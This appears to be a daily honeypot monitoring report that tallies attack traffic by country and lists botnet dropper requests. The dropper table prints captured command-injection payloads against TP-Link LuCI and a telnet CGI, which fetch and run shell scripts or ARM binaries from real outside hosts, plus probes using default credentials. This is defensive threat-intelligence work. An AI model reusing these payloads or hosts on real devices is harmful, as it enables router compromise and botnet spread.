Daily Report: 2025-08-31#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 7 stage 1 IP address(es), linked to 3 dropper URL(s).
There are 10 new requests that have never been observed before (these were added to the monitored request database.).
A total of 450 requests were recorded during the day, originating from 7 different countries, with a peak of 104 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
US | Germany |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
61.80.239.193 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
58.40.8.206 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
207.189.221.46 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
221.159.119.6 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
139.216.137.182 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
121.167.125.180 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1 |
91.224.92.22 | GET /cgi-bin/shortcut_telnet.cgi?cd%20/var/tmp;rm%20-rf%20arm7;wget%20http://91.224.92.22:58485/observatory/arm7;chmod%20777%20*;./arm7%20fibn HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
9 | 5 | CONNECT 196.251.87.42:80 HTTP/1.0 |
64 | 2 | GET /orvzjhhwrr/rh86fmvgaj/41042 HTTP/1.1 |
88 | 1 | GET /portal/loginpage.aspx HTTP/1.1 |
102 | 1 | \x00\x0E8\xCF |
117 | 1 | \x00\x0E8\x97\x89(Z\xBC\xEA\x84(\x00\x00\x00\x00\x00 |
121 | 1 | \x04\x01\x00P\xC4\xFBW*\x00 |
123 | 1 | \x04\x01\x00P\xC4\xFBW*ubnt:ubnt\x00 |
126 | 1 | \x04\x01\x00P\xC4\xFBW*support:support\x00 |
127 | 1 | \x04\x01\x00P\xC4\xFBW*oracle:oracle\x00 |
128 | 1 | \x04\x01\x00P\xC4\xFBW*cisco:cisco\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 104 | US |
1 | 64 | GB |
2 | 46 | ID |
3 | 46 | KZ |
4 | 39 | SC |
5 | 25 | DE |
6 | 24 | NL |
7 | 24 | CA |
8 | 11 | KR |
9 | 11 | SG |
10 | 10 | CN |
11 | 9 | CH |
12 | 6 | AU |
13 | 4 | JP |
14 | 4 | UA |
15 | 3 | BG |
16 | 3 | FR |
17 | 3 | BE |
18 | 3 | IT |
19 | 2 | RU |
20 | 2 | BR |
21 | 1 | MN |
22 | 1 | PT |
23 | 1 | MC |
24 | 1 | AM |
25 | 1 | TW |
26 | 1 | IN |
27 | 1 | HK |